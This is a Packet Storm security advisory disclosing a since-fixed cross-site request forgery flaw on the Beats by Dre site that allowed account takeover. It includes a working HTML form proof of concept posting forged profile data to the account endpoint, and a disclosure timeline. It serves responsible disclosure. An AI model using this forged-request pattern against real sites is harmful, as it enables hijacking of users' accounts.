Beats By Dre Cross Site Request Forgery

2016-07-31T00:00:00
ID PACKETSTORM:138121
Type packetstorm
Reporter Aaditya Purani
Modified 2016-07-31T00:00:00

Description

                                        
                                            `Hello,  
  
I am Aaditya Purani, and i had found an CSRF (Cross Site Request Forgery )  
on Beats by Dr.Dre which could lead to full Account Takeover and  
Information change by Just sending a Malicious crafted Link to the user.  
  
Proof of Concept:  
  
<html>  
<!-- CSRF PoC - By Aaditya Purani -->  
<body>  
<form method='POST' action="  
https://www.beatsbydre.com/on/demandware.store/Sites-beats-Site/en_US/GigyaRAAS-SaveCustomer  
">  
<input type="hidden" name="firstName" value="hacked" />  
<input type="hidden" name="lastName" value="hackerone" />  
<input type="hidden" name="emailAddress" value="victimsemail@gmail.com" /> <  
input type="hidden" name="zip" value="" />  
<input type="hidden" name="phone" value="" />  
<input type="hidden" name="csrf_token" value="  
VxM7k0ya2N1R69Ix9E3m/2165n60n2p399n38q6r1904o1po98r1snn323q0q/3Ex5Klu9mD1x5vMo91  
" />  
<input type="hidden" name="isEmailSubscription" value="true" />  
<input type="hidden" name="isAlreadySubscribed" value="false" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
Response :  
  
{aisCustomerSavedSuccessfullya: true, aunsubscribeStatusa: null } -> Attack  
Successful  
  
{aisCustomerSavedSuccessfullya: false, aunsubscribeStatusa: null } ->  
Attack Unsuccessful  
  
  
Clicking on this Link, would change details of any User. I have wrote an  
Complete Blog here:  
https://aadityapurani.com/2016/07/20/how-i-hacked-your-beats-account-apple-bug-bounty/  
  
Video PoC: https://youtu.be/2SfmmWxiDck  
  
Apple has Acknowledged me in their Hall of fame:  
https://support.apple.com/en-us/HT201536  
  
*Timeline:*  
  
October 8th 2015 a Reported  
October 23th 2015 a Triaged  
November 6th 2015 a Responded that aMatter is being investigateda  
January 18th 2016 a Fixed  
June 20th 2016 a Acknowledged  
`